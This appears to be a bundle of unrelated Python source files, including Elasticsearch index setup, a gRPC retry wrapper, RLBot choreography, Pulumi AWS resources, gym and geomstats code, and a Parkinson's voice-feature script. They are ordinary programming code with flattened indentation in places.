awsauth = AWS4Auth(credentials.access_key, credentials.secret_key,
region, 'es', session_token=credentials.token)
es = Elasticsearch(
hosts=[{'host': host, 'port': 443}],
http_auth=awsauth,
use_ssl=True,
verify_certs=True,
connection_class=RequestsHttpConnection
)
mapping = {
"mappings": {
"dynamic_templates": [
{
"my_dynamic_ja_analyzer_conf": {
"match_mapping_type": "*",
"match": "*_ja",
"mapping": {
"analyzer": "my_ja_analyzer_conf",
"fields": {
"keyword": {
"type": "keyword",
"ignore_above": 256
}
}
}
}
},
{
"my_dynamic_title_analyzer_conf": {
"match_mapping_type": "*",
"match": "_title",
"mapping": {
"analyzer": "my_ja_analyzer_conf",
"fields": {
"keyword": {
"type": "keyword",
"ignore_above": 256
}
}
}
}
}
]
},
"settings": {
"analysis": {
"analyzer": {
"my_ja_analyzer_conf": {
"type": "custom",
"tokenizer": "kuromoji_tokenizer",
"mode": "search",
"char_filter": [
"icu_normalizer",
"kuromoji_iteration_mark"
],
"filter": [
"kuromoji_baseform",
"kuromoji_part_of_speech",
"ja_stop",
"lowercase",
"kuromoji_number",
"kuromoji_stemmer",
"asciifolding"
]
}
}
}
}
}
if es.indices.exists(index=INDEX):
es.indices.delete(INDEX)
es.indices.create(index=INDEX, body=mapping) |
# -*- coding:utf-8 -*-
from __future__ import absolute_import, unicode_literals, print_function
import time
import logging
from decouple import config
from grpc import StatusCode
from grpc._channel import _Rendezvous, _UnaryUnaryMultiCallable
logger = logging.getLogger(__name__)
# The maximum number of retries
_MAX_RETRIES_BY_CODE = {
# Internal errors. This means that some invariants expected by the
# underlying system have been broken. This error code is reserved for
# serious errors
StatusCode.INTERNAL: config('GRPC_RETRY_INTERNAL', default=1, cast=int),
# The operation was aborted, typically due to a concurrency issue such as a
# sequencer check failure or transaction abort. See the guidelines above for
# deciding between FAILED_PRECONDITION, ABORTED, and UNAVAILABLE.
    StatusCode.ABORTED: config('GRPC_RETRY_ABORTED', default=3, cast=int),
    # The service is currently unavailable. This is most likely a transient
    # condition, which can be corrected by retrying with a backoff. Note that it
    # is not always safe to retry non-idempotent operations.
StatusCode.UNAVAILABLE: config('GRPC_RETRY_UNAVAILABLE', default=5,
cast=int),
# The deadline expired before the operation could complete. For operations
# that change the state of the system, this error may be returned even if
# the operation has completed successfully. For example, a successful
    # response from a server could have been delayed long enough for the
    # deadline to expire.
StatusCode.DEADLINE_EXCEEDED: config('GRPC_RETRY_DEADLINE_EXCEEDED',
default=5, cast=int),
}
# The minimum seconds (float) of sleeping
_MIN_SLEEPING = config('GRPC_RETRY_MIN_SLEEPING', default=0.015625, cast=float)
_MAX_SLEEPING = config('GRPC_RETRY_MAX_SLEEPING', default=1.0, cast=float)
class RetriesExceeded(Exception):
"""docstring for RetriesExceeded"""
pass
def retry(f, transactional=False):
def wraps(*args, **kwargs):
retries = 0
while True:
try:
return f(*args, **kwargs)
#except _Rendezvous as e:
except Exception as e:
code = e.code()
max_retries = _MAX_RETRIES_BY_CODE.get(code)
                if max_retries is None or (transactional and code == StatusCode.ABORTED):
raise
if retries > max_retries:
raise RetriesExceeded(e)
backoff = min(_MIN_SLEEPING * 2 ** retries, _MAX_SLEEPING)
logger.error("sleeping %r for %r before retrying failed request...", backoff, code)
retries += 1
time.sleep(backoff)
return wraps
def retrying_stub_methods(obj):
for key, attr in obj.__dict__.items():
if isinstance(attr, _UnaryUnaryMultiCallable):
setattr(obj, key, retry(attr))
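# Example usage (editorial sketch; `FooServiceStub` and the channel address are
# illustrative placeholders, not part of this module):
# import grpc
# channel = grpc.insecure_channel("localhost:50051")
# stub = FooServiceStub(channel)
# retrying_stub_methods(stub)  # unary-unary stub methods now retry with backoff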
|
from math import pi
from typing import List
from rlbot.utils.rendering.rendering_manager import RenderingManager
from rlbot.utils.structures.game_data_struct import GameTickPacket
from rlutilities.linear_algebra import vec3, dot, look_at, axis_to_rotation, cross
from rlutilities.simulation import Ball, Input, Curve
from choreography.choreography_main import Choreography
from choreography.drone import Drone
from choreography.group_step import BlindBehaviorStep, StateSettingStep, ParallelStep, DroneListStep
from choreography.paths.dragon_paths import BLUE_DRAGON_PATH, PURPLE_DRAGON_PATH
from choreography.utils.vector_math import direction
TOTAL_SPEED = 0.7
class RingsSetup(StateSettingStep):
target_indexes = range(10, 40)
def set_ball_state(self, ball: Ball):
ball.position = vec3(0, 0, -500)
ball.velocity = vec3(0, 0, 0)
ball.angular_velocity = vec3(0, 0, 0)
def set_drone_states(self, drones: List[Drone]):
for i, drone in enumerate(drones):
shifted_index = i - 15
sign = 1 if shifted_index >= 0 else -1
if sign > 0:
shifted_index = 15 - shifted_index
drone.position = vec3(shifted_index * 200 + sign * 800, -600 * sign, 20)
drone.velocity = vec3(0, 0, 0)
drone.angular_velocity = vec3(0, 0, 0)
drone.orientation = look_at(vec3(0, 1, 0) * sign, vec3(0, 0, 1))
class HideDragons(StateSettingStep):
target_indexes = range(0, 10)
def set_drone_states(self, drones: List[Drone]):
for i, drone in enumerate(drones):
drone.position = vec3(i * 100, 6000, 0)
class Dragon(StateSettingStep):
duration = 65.0 / TOTAL_SPEED
distance_between_body_parts = 300
path: Curve = None
RENDER_PATH = False
def set_drone_states(self, drones: List[Drone]):
        # get the length of the path from start to the dragon's head (first bot)
head_t = self.time_since_start / self.duration * self.path.length
for drone in drones:
# offset the other body parts
drone_t = head_t - self.distance_between_body_parts * (drone.id - drones[0].id)
# if we're not on the path yet, don't do any state setting
if drone_t < 0:
continue
t = self.path.length - drone_t # because Curve.point_at's argument means distance to end
pos = self.path.point_at(t)
pos_ahead = self.path.point_at(t - 500)
pos_behind = self.path.point_at(t + 300)
# figure out the orientation of the body part
facing_direction = direction(pos_behind, pos)
target_left = cross(facing_direction, direction(pos, pos_ahead))
target_up = cross(target_left, facing_direction)
up = drone.up() + target_up * 0.9 + vec3(0, 0, 0.1)
target_orientation = look_at(facing_direction, up)
drone.position = pos_behind
drone.velocity = facing_direction * (self.path.length / self.duration)
drone.angular_velocity = vec3(0, 0, 0) # TODO: setting correct angular velocity could help with replays
drone.orientation = target_orientation
def render(self, renderer: RenderingManager):
if self.RENDER_PATH:
renderer.draw_polyline_3d(self.path.points[::5], renderer.white())
class BlueDragon(Dragon):
path = Curve(BLUE_DRAGON_PATH.to_points(2000))
target_indexes = range(0, 5)
class PurpleDragon(Dragon):
path = Curve(PURPLE_DRAGON_PATH.to_points(2000))
target_indexes = range(5, 10)
class RingOfFire(DroneListStep):
ring_radius = 500
orbit_radius = 2200
orbit_center = vec3(0, 0, 1400)
starting_orbit_rotation: float = None
orbit_start_delay = 20 / TOTAL_SPEED
orbit_speed = 0.45 * TOTAL_SPEED
def step(self, packet: GameTickPacket, drones: List[Drone]):
orbit_t = max(0, self.time_since_start - self.orbit_start_delay)
orbit_rotation = self.starting_orbit_rotation + orbit_t * self.orbit_speed
direction_from_center = dot(axis_to_rotation(vec3(0, 0, 1) * orbit_rotation), vec3(1, 0, 0))
ring_center = self.orbit_center + direction_from_center * self.orbit_radius
ring_facing_direction = cross(direction_from_center, vec3(0, 0, 1))
for drone in drones:
i = drone.id - drones[0].id
angle = i / len(drones) * pi * 2
pos = ring_center + dot(vec3(0, 0, 1), axis_to_rotation(ring_facing_direction * angle)) * self.ring_radius
if pos[2] > self.orbit_center[2] + self.ring_radius - self.time_since_start * 200:
drone.hover.target = pos
drone.hover.up = ring_facing_direction
drone.hover.step(self.dt)
drone.controls = drone.hover.controls
drone.controls.jump = True
class Ring1(RingOfFire):
target_indexes = range(10, 25)
starting_orbit_rotation = pi
class Ring2(RingOfFire):
target_indexes = range(25, 40)
starting_orbit_rotation = 0
class DragonBoost(BlindBehaviorStep):
target_indexes = range(0, 10)
def set_controls(self, controls: Input):
controls.boost = True
class Wait(BlindBehaviorStep):
duration = 5.0
def set_controls(self, controls: Input):
pass
class DragonsChoreography(Choreography):
map_name = "Mannfield_Night"
@staticmethod
def get_appearances(num_bots: int) -> List[str]:
return ['blue_dragon.cfg'] * 5 + ['purple_dragon.cfg'] * 5 + ['fire.cfg'] * 30
@staticmethod
def get_teams(num_bots: int) -> List[int]:
return [0] * 10 + [1] * 30
@staticmethod
def get_num_bots():
return 40
def generate_sequence(self):
self.sequence = [
Wait(),
HideDragons(),
RingsSetup(),
ParallelStep([
BlueDragon(),
PurpleDragon(),
DragonBoost(),
Ring1(),
Ring2()
]),
]
|
array = [0, 0, 0, 0, 0, 0]
for i in range(len(array)):
array[i] = len(array)-i
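# array is now [6, 5, 4, 3, 2, 1] (editorial note)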
|
import logging
import pytest
from pygate_grpc.client import PowerGateClient
from pygate_grpc.types import User
logger = logging.getLogger(__name__)
@pytest.fixture(scope="module")
def user(pygate_client: PowerGateClient):
return pygate_client.admin.users.create()
@pytest.fixture(scope="module")
def staged_file(pygate_client: PowerGateClient, user: User):
original_file_contents = b"Another file for staging and testing"
staged_file = pygate_client.data.stage_bytes(
original_file_contents, token=user.token
)
pygate_client.config.apply(staged_file.cid, token=user.token, override=True)
return staged_file
def test_storage_deals(pygate_client: PowerGateClient, user: User):
records = pygate_client.deals.storage_deal_records(
include_pending=True, include_final=True, token=user.token
)
assert type(records) == list
def test_retrieval_deals(pygate_client: PowerGateClient, user: User):
records = pygate_client.deals.retrieval_deal_records(
include_pending=True, include_final=True, token=user.token
)
assert type(records) == list
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from .. import utilities, tables
class VaultLock(pulumi.CustomResource):
complete_lock: pulumi.Output[bool]
"""
    Boolean whether to permanently apply this Glacier Lock Policy. Once completed, this cannot be undone. If set to `false`, the Glacier Lock Policy remains in a testing mode for 24 hours. After that time, the Glacier Lock Policy is automatically removed by Glacier and this provider resource will show as needing recreation. Changing this from `false` to `true` will show as resource recreation, which is expected. Changing this from `true` to `false` is not possible unless the Glacier Vault is recreated at the same time.
"""
ignore_deletion_error: pulumi.Output[bool]
"""
Allow this provider to ignore the error returned when attempting to delete the Glacier Lock Policy. This can be used to delete or recreate the Glacier Vault via this provider, for example, if the Glacier Vault Lock policy permits that action. This should only be used in conjunction with `complete_lock` being set to `true`.
"""
policy: pulumi.Output[str]
"""
JSON string containing the IAM policy to apply as the Glacier Vault Lock policy.
"""
vault_name: pulumi.Output[str]
"""
The name of the Glacier Vault.
"""
def __init__(__self__, resource_name, opts=None, complete_lock=None, ignore_deletion_error=None, policy=None, vault_name=None, __props__=None, __name__=None, __opts__=None):
"""
Manages a Glacier Vault Lock. You can refer to the [Glacier Developer Guide](https://docs.aws.amazon.com/amazonglacier/latest/dev/vault-lock.html) for a full explanation of the Glacier Vault Lock functionality.
> **NOTE:** This resource allows you to test Glacier Vault Lock policies by setting the `complete_lock` argument to `false`. When testing policies in this manner, the Glacier Vault Lock automatically expires after 24 hours and this provider will show this resource as needing recreation after that time. To permanently apply the policy, set the `complete_lock` argument to `true`. When changing `complete_lock` to `true`, it is expected the resource will show as recreating.
        !> **WARNING:** Once a Glacier Vault Lock is completed, it is immutable. The deletion of the Glacier Vault Lock is not possible and attempting to remove it from this provider will return an error. Set the `ignore_deletion_error` argument to `true` and apply this configuration before attempting to delete this resource via this provider or remove this resource from this provider's management.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[bool] complete_lock: Boolean whether to permanently apply this Glacier Lock Policy. Once completed, this cannot be undone. If set to `false`, the Glacier Lock Policy remains in a testing mode for 24 hours. After that time, the Glacier Lock Policy is automatically removed by Glacier and this provider resource will show as needing recreation. Changing this from `false` to `true` will show as resource recreation, which is expected. Changing this from `true` to `false` is not possible unless the Glacier Vault is recreated at the same time.
:param pulumi.Input[bool] ignore_deletion_error: Allow this provider to ignore the error returned when attempting to delete the Glacier Lock Policy. This can be used to delete or recreate the Glacier Vault via this provider, for example, if the Glacier Vault Lock policy permits that action. This should only be used in conjunction with `complete_lock` being set to `true`.
:param pulumi.Input[str] policy: JSON string containing the IAM policy to apply as the Glacier Vault Lock policy.
:param pulumi.Input[str] vault_name: The name of the Glacier Vault.
> This content is derived from https://github.com/terraform-providers/terraform-provider-aws/blob/master/website/docs/r/glacier_vault_lock.html.markdown.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
if complete_lock is None:
raise TypeError("Missing required property 'complete_lock'")
__props__['complete_lock'] = complete_lock
__props__['ignore_deletion_error'] = ignore_deletion_error
if policy is None:
raise TypeError("Missing required property 'policy'")
__props__['policy'] = policy
if vault_name is None:
raise TypeError("Missing required property 'vault_name'")
__props__['vault_name'] = vault_name
super(VaultLock, __self__).__init__(
'aws:glacier/vaultLock:VaultLock',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name, id, opts=None, complete_lock=None, ignore_deletion_error=None, policy=None, vault_name=None):
"""
Get an existing VaultLock resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param str id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[bool] complete_lock: Boolean whether to permanently apply this Glacier Lock Policy. Once completed, this cannot be undone. If set to `false`, the Glacier Lock Policy remains in a testing mode for 24 hours. After that time, the Glacier Lock Policy is automatically removed by Glacier and this provider resource will show as needing recreation. Changing this from `false` to `true` will show as resource recreation, which is expected. Changing this from `true` to `false` is not possible unless the Glacier Vault is recreated at the same time.
:param pulumi.Input[bool] ignore_deletion_error: Allow this provider to ignore the error returned when attempting to delete the Glacier Lock Policy. This can be used to delete or recreate the Glacier Vault via this provider, for example, if the Glacier Vault Lock policy permits that action. This should only be used in conjunction with `complete_lock` being set to `true`.
:param pulumi.Input[str] policy: JSON string containing the IAM policy to apply as the Glacier Vault Lock policy.
:param pulumi.Input[str] vault_name: The name of the Glacier Vault.
> This content is derived from https://github.com/terraform-providers/terraform-provider-aws/blob/master/website/docs/r/glacier_vault_lock.html.markdown.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["complete_lock"] = complete_lock
__props__["ignore_deletion_error"] = ignore_deletion_error
__props__["policy"] = policy
__props__["vault_name"] = vault_name
return VaultLock(resource_name, opts=opts, __props__=__props__)
def translate_output_property(self, prop):
return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
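# Example usage (editorial sketch; resource names and the policy document are
# illustrative placeholders, not taken from this module):
# import pulumi_aws as aws
# vault = aws.glacier.Vault("exampleVault")
# lock = aws.glacier.VaultLock("exampleLock",
#     complete_lock=False,          # keep the 24-hour test mode while iterating
#     vault_name=vault.name,
#     policy=EXAMPLE_POLICY_JSON)   # an IAM policy document serialized as JSON (placeholder)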
|
import collections
import gym
import numpy as np
class StateOccupancyCounter(gym.Wrapper):
def __init__(self, env):
super().__init__(env)
self.reset()
def reset(self):
self.state_occupancy_counts = collections.Counter()
obs = self.env.reset()
self.prev_obs_hash = None
self.update_state_occupancy_count(obs)
return obs
def step(self, action):
obs, rew, done, info = self.env.step(action)
occupancy_info = self.update_state_occupancy_count(obs)
info.update(occupancy_info)
return obs, rew, done, info
def compute_obs_hash(self, obs):
        return hash(obs.tobytes())
def update_state_occupancy_count(self, obs):
"""Updates the occupancy count and returns a dict of info."""
obs_hash = self.compute_obs_hash(obs)
matches_previous_obs = self.prev_obs_hash is not None and obs_hash == self.prev_obs_hash
self.state_occupancy_counts[obs_hash] += 1
self.prev_obs_hash = obs_hash
return {
"occupancy_count": self.state_occupancy_counts[obs_hash],
"num_unique_states": len(self.state_occupancy_counts),
"matches_previous_obs": matches_previous_obs
}
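    # For example, revisiting an already-seen observation yields something like
    # {"occupancy_count": 2, "num_unique_states": 1, "matches_previous_obs": True}
    # (editorial illustration, not part of the original module).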
if __name__ == "__main__":
def time_function(f, num_iters, *args):
import sys
import time
start = time.time()
for itr in range(num_iters):
sys.stdout.write(f"\r{itr + 1} / {num_iters}")
f(*args)
end = time.time()
print(f"\nTook {end - start:0.4f} seconds")
import copy
num_imgs = 2048
height = 64
width = 64
channels = 6
num_iters = 100
import gym
env = gym.make("procgen:procgen-caveflyer-v0")
env = StateOccupancyCounter(env)
obs = []
x = env.reset()
obs.append(x)
infos = []
for i in range(1, num_imgs):
x, _, done, info = env.step(env.action_space.sample())
obs.append(x)
infos.append(info)
obs = np.array(obs)
counts = [i["occupancy_count"] for i in infos]
print(counts)
print(collections.Counter(counts))
import ipdb
ipdb.set_trace()
# def hash_obses(env, obs):
# for o in obs:
# env.compute_obs_hash(o)
# time_function(hash_obses, 4000, env, obs)
# imgs = result_a
# import matplotlib.pyplot as plt
# for ob, img in zip(obs, imgs):
# fig, axs = plt.subplots(2, 1, figsize=(16, 16))
# axs[0].imshow(ob[:, :, :3].detach().cpu().to(torch.uint8).numpy())
# axs[1].imshow(img[:, :, :3].detach().cpu().to(torch.uint8).numpy())
# plt.show()
|
#! /usr/bin/env python3
import argparse
import yaml
def merge_two_dict(d1, d2):
result = {}
for key in set(d1) | set(d2):
if isinstance(d1.get(key), dict) or isinstance(d2.get(key), dict):
result[key] = merge_two_dict(d1.get(key, dict()), d2.get(key, dict()))
else:
result[key] = d1.get(key, 0) + d2.get(key, 0)
return result
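# Example (editorial note): overlapping numeric leaves are summed, nested dicts
# are merged recursively, and missing keys default to 0.
# merge_two_dict({"a": 1, "b": {"x": 2}}, {"a": 3, "b": {"x": 4}, "c": 5})
# -> {"a": 4, "b": {"x": 6}, "c": 5}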
def merge_yaml_files(input_yamls, output_yaml):
output = {}
for input_yaml in input_yamls:
with open(input_yaml) as open_input:
data = yaml.safe_load(open_input) or {}
output = merge_two_dict(output, data)
with open(output_yaml, 'w') as open_output:
yaml.safe_dump(output, open_output)
def main():
    description = ('Merge multiple yaml files containing stats by summing the overlapping fields')
parser = argparse.ArgumentParser(description=description)
parser.add_argument('--inputs', type=str, required=True, nargs='+',
help='YAML files containing the input summary metrics')
parser.add_argument('--output', type=str, required=True,
help='YAML files containing the output summary metrics')
args = parser.parse_args()
merge_yaml_files(args.inputs, args.output)
if __name__ == '__main__':
main()
|
"""
The Sims 4 Community Library is licensed under the Creative Commons Attribution 4.0 International public license (CC BY 4.0).
https://creativecommons.org/licenses/by/4.0/
https://creativecommons.org/licenses/by/4.0/legalcode
Copyright (c) COLONOLNUTTY
"""
from typing import Union
from sims4communitylib.enums.statistics_enum import CommonStatisticId
from statistics.statistic import Statistic
from sims4communitylib.utils.common_resource_utils import CommonResourceUtils
from sims4.resources import Types
class CommonStatisticUtils:
"""Utilities for manipulating Statistics.
"""
@staticmethod
def get_statistic_initial_value(statistic_id: Union[int, CommonStatisticId]) -> float:
"""get_statistic_initial_value(statistic_id)
Retrieve the Initial Value of a Statistic.
:param statistic_id: The identifier of the Statistic to use.
:type statistic_id: Union[int, CommonStatisticId]
:return: The initial value of the statistic.
:rtype: float
"""
statistic_instance = CommonStatisticUtils.load_statistic_by_id(statistic_id)
if statistic_instance is None:
return -1.0
if not hasattr(statistic_instance, 'get_initial_value'):
return statistic_instance.default_value
return statistic_instance.get_initial_value()
@staticmethod
def get_statistic_min_value(statistic_id: Union[int, CommonStatisticId]) -> float:
"""get_statistic_min_value(statistic_id)
Retrieve the Minimum Value of a Statistic.
:param statistic_id: The identifier of the Statistic to use.
:type statistic_id: Union[int, CommonStatisticId]
:return: The minimum value of the statistic.
:rtype: float
"""
statistic_instance = CommonStatisticUtils.load_statistic_by_id(statistic_id)
if statistic_instance is None:
return -1.0
return statistic_instance.min_value
@staticmethod
def get_statistic_max_value(statistic_id: Union[int, CommonStatisticId]) -> float:
"""get_statistic_max_value(statistic_id)
Retrieve the Maximum Value of a Statistic.
:param statistic_id: The identifier of the Statistic to use.
:type statistic_id: Union[int, CommonStatisticId]
:return: The maximum value of the statistic.
:rtype: float
"""
statistic_instance = CommonStatisticUtils.load_statistic_by_id(statistic_id)
if statistic_instance is None:
return -1.0
return statistic_instance.max_value
@staticmethod
def load_statistic_by_id(statistic_id: Union[int, CommonStatisticId]) -> Union[Statistic, None]:
"""load_statistic(statistic_id)
Load an instance of a Statistic by its decimal identifier.
:param statistic_id: The decimal identifier of a Statistic.
:type statistic_id: Union[int, CommonStatisticId]
:return: An instance of a Statistic matching the decimal identifier or None if not found.
:rtype: Union[Statistic, None]
"""
return CommonResourceUtils.load_instance(Types.STATISTIC, statistic_id)
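# Example usage (editorial sketch; 16652 is a placeholder statistic id, not a
# known game value -- a CommonStatisticId member could be passed instead):
# initial = CommonStatisticUtils.get_statistic_initial_value(16652)
# bounds = (CommonStatisticUtils.get_statistic_min_value(16652),
#           CommonStatisticUtils.get_statistic_max_value(16652))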
|
def printStudentDetails(name, age, marks, stream):
print('Student details')
print('Name: {}, Age: {}, Marks: {}, Stream: {}'.format(
name, age, marks, stream
))
printStudentDetails('pema', 28, 300, 'Datasci')
#unpacking
d = {'name': "john", "stream": "ece", 'age': 17, 'marks': 700}
printStudentDetails(**d)
# printStudentDetails(*d) would only unpack the dictionary keys, so it is not the right way
|
from botlang.evaluation.values import ReturnNode
def return_node(environment, inner_node):
try:
environment.lookup(Slots.DIGRESSION_RETURN)
except NameError:
return inner_node
else:
return ReturnNode(inner_node)
def is_disgression(environment):
return Slots.digression_started(environment)
class Slots(object):
CURRENT_SLOTS_NODE = '__CURRENT_SLOTS_NODE__'
DIGRESSION_RETURN = '__DIGRESSION_RETURN_NODE__'
SLOTS_FUNCTIONS = {
'digression?': is_disgression,
'return': return_node
}
@classmethod
def get_base_environment(cls, environment):
base_env = environment
while base_env.previous is not None:
base_env = base_env.previous
return base_env
@classmethod
def digression_started(cls, environment):
base_env = cls.get_base_environment(environment)
return base_env.bindings.get(Slots.DIGRESSION_RETURN, False)
@classmethod
def start_digression(cls, environment):
base_env = cls.get_base_environment(environment)
base_env.bindings[Slots.DIGRESSION_RETURN] = True
@classmethod
def end_digression(cls, environment):
base_env = cls.get_base_environment(environment)
del base_env.bindings[Slots.DIGRESSION_RETURN]
|
#Test001.py
def HelloWorld():
print ("Hello World")
def add(a, b):
return a+b
def TestDict(dict):
print (dict)
dict["Age"] = 17
return dict
class Person:
def greet(self, greetStr):
print (greetStr)
#print add(5,7)
#a = raw_input("Enter To Continue...")
|
# -*- coding: utf-8 -*-
"""
Created on Sat Jul 4 02:33:34 2020
@author: Admin
"""
import pandas as pd
import numpy as np
import parselmouth
from parselmouth.praat import call
import nolds
from scipy import signal
from scipy.io import wavfile
from pyentrp import entropy
import sys
def measurePitch(voiceID, f0min, f0max, unit):
sound = parselmouth.Sound(voiceID) # read the sound
pitch = call(sound, "To Pitch", 0.0, f0min, f0max) #create a praat pitch object
meanF0 = call(pitch, "Get mean", 0, 0, unit) # get mean pitch
stdevF0 = call(pitch, "Get standard deviation", 0 ,0, unit) # get standard deviation
#harmonicity = call(sound, "To Harmonicity (cc)", 0.01, 75, 0.1, 1.0)
#hnr = call(harmonicity, "Get mean", 0, 0)
pointProcess = call(sound, "To PointProcess (periodic, cc)", f0min, f0max)
localJitter = call(pointProcess, "Get jitter (local)", 0, 0, 0.0001, 0.02, 1.3)
localabsoluteJitter = call(pointProcess, "Get jitter (local, absolute)", 0, 0, 0.0001, 0.02, 1.3)
rapJitter = call(pointProcess, "Get jitter (rap)", 0, 0, 0.0001, 0.02, 1.3)
ppq5Jitter = call(pointProcess, "Get jitter (ppq5)", 0, 0, 0.0001, 0.02, 1.3)
ddpJitter = call(pointProcess, "Get jitter (ddp)", 0, 0, 0.0001, 0.02, 1.3)
localShimmer = call([sound, pointProcess], "Get shimmer (local)", 0, 0, 0.0001, 0.02, 1.3, 1.6)
localdbShimmer = call([sound, pointProcess], "Get shimmer (local_dB)", 0, 0, 0.0001, 0.02, 1.3, 1.6)
apq3Shimmer = call([sound, pointProcess], "Get shimmer (apq3)", 0, 0, 0.0001, 0.02, 1.3, 1.6)
aqpq5Shimmer = call([sound, pointProcess], "Get shimmer (apq5)", 0, 0, 0.0001, 0.02, 1.3, 1.6)
apq11Shimmer = call([sound, pointProcess], "Get shimmer (apq11)", 0, 0, 0.0001, 0.02, 1.3, 1.6)
ddaShimmer = call([sound, pointProcess], "Get shimmer (dda)", 0, 0, 0.0001, 0.02, 1.3, 1.6)
voice_report = call([sound,pitch,pointProcess], "Voice report", 0.0, 0.0, f0min, f0max, 1.3, 1.6, 0.03, 0.45)
return meanF0, stdevF0, localJitter, localabsoluteJitter, rapJitter, ppq5Jitter, ddpJitter, localShimmer, localdbShimmer, apq3Shimmer, aqpq5Shimmer, apq11Shimmer, ddaShimmer, voice_report
AudioFile_path = sys.argv[1]
sample_rate, samples = wavfile.read(AudioFile_path)
frequencies, times, spectogram = signal.spectrogram(samples, sample_rate)
sound = parselmouth.Sound(AudioFile_path)
DFA = nolds.dfa(times)
PPE = entropy.shannon_entropy(times)
(meanF0, stdevF0, localJitter, localabsoluteJitter, rapJitter, ppq5Jitter, ddpJitter, localShimmer, localdbShimmer, apq3Shimmer, aqpq5Shimmer, apq11Shimmer, ddaShimmer, voice_report) = measurePitch(sound, 75, 500, "Hertz")
voice_report = voice_report.strip()
hnr = voice_report[984:989]
nhr = voice_report[941:953]
# from sklearn.preprocessing import MinMaxScaler
# sc = MinMaxScaler()
# DFA = sc.fit_transform(DFA)
# PPE = sc.fit_transform(PPE)
df_1 = pd.DataFrame(np.column_stack([localJitter,localabsoluteJitter,rapJitter,ppq5Jitter,ddpJitter,localShimmer,localdbShimmer,apq3Shimmer,aqpq5Shimmer,apq11Shimmer,ddaShimmer,nhr,hnr,DFA,PPE]),
columns=['Jitter(%)','Jitter(Abs)','Jitter:RAP','Jitter:PPQ5','Jitter:DDP','Shimmer','Shimmer(dB)','Shimmer:APQ3','Shimmer:APQ5','Shimmer:APQ11','Shimmer:DDA','NHR','HNR','DFA','PPE'])
df = pd.read_csv('C:/Users/Admin/BE Project/FINAL_YEAR_PROJECT-master//PDProject/Net_Model/parkinson_dataset_1.csv')
X = df.iloc[:, 6:21].values
Y = df.iloc[:, 4:6].values
vertical_stack = pd.concat([df.iloc[:, 6:21], df_1], axis=0)
X_new = vertical_stack.iloc[:, 0:15].values
from sklearn.preprocessing import MinMaxScaler
sc = MinMaxScaler()
X_new = sc.fit_transform(X_new)
y_new = sc.fit_transform(Y)
import keras
from keras.models import load_model
best_model = load_model('C:/Users/Admin/BE Project/FINAL_YEAR_PROJECT-master//PDProject/Net_Model/weights-improvement-998-0.0021.hdf5',compile=False)
Y = best_model.predict(X_new[5874:5875])
Y_pred_org = sc.inverse_transform(Y)
MOTOR_UPDRS = Y_pred_org[0][0]
TOTAL_UPDRS = Y_pred_org[0][1]
Result = "Patient's Motor Updrs Value : %s and Total Updrs Value : %s" %(MOTOR_UPDRS,TOTAL_UPDRS)
print(Result) |
"""Unit tests for the KDE classifier."""
import geomstats.backend as gs
import geomstats.tests
from geomstats.geometry.euclidean import Euclidean
from geomstats.geometry.hyperboloid import Hyperboloid
from geomstats.geometry.hypersphere import Hypersphere
from geomstats.geometry.poincare_ball import PoincareBall
from geomstats.learning.kernel_density_estimation_classifier import \
KernelDensityEstimationClassifier
from geomstats.learning.radial_kernel_functions import triangular_radial_kernel
class TestKernelDensityEstimationClassifier(geomstats.tests.TestCase):
"""Class defining the Kernel Density Estimation Classifier tests."""
def setUp(self):
"""Define the parameters to test."""
gs.random.seed(1234)
self.dim = 2
self.space = Euclidean(dim=self.dim)
self.distance = self.space.metric.dist
def test_predict(self):
"""Test the 'predict' class method."""
training_dataset = gs.array(
[[0.0, 0.0],
[1.0, 0.0],
[2.0, 0.0],
[3.0, 0.0]])
labels = [0, 0, 1, 1]
kde = KernelDensityEstimationClassifier(distance=self.distance)
kde.fit(training_dataset, labels)
result = kde.predict(gs.array([[1.1, 0.0]]))
expected = gs.array([0])
self.assertAllClose(expected, result)
def test_predict_one_dimensional_data(self):
"""Test the 'predict' class method."""
training_dataset = gs.array(
[[0.0],
[1.0],
[2.0],
[3.0]])
labels = [0, 0, 1, 1]
kde = KernelDensityEstimationClassifier(
distance='minkowski')
kde.fit(training_dataset, labels)
result = kde.predict(gs.array([1.1]))
expected = gs.array([0])
self.assertAllClose(expected, result)
@geomstats.tests.np_only
def test_predict_one_dimensional_data_callable_distance(self):
"""Test the 'predict' class method on one dimensional data."""
training_dataset = gs.array([0, 1, 2, 3])
labels = [0, 0, 1, 1]
kde = KernelDensityEstimationClassifier(
distance=self.distance)
kde.fit(training_dataset, labels)
result = kde.predict(gs.array([1.1]))
expected = gs.array([0])
self.assertAllClose(expected, result)
@geomstats.tests.np_only
def test_predict_proba_uniform_kernel_one_dimensional_data(self):
"""Test the 'predict_proba' class method using the 'uniform' kernel.
Test the 'predict_proba' class method using the 'uniform' kernel on
        one-dimensional data of shape [n_samples,].
"""
training_dataset = gs.array([0, 1, 2, 3])
labels = [0, 0, 1, 1]
kde = KernelDensityEstimationClassifier(
kernel='uniform',
distance=self.distance)
kde.fit(training_dataset, labels)
result = kde.predict_proba(gs.array([0.9]))
expected = gs.array([[1 / 2, 1 / 2]])
self.assertAllClose(expected, result, atol=gs.atol)
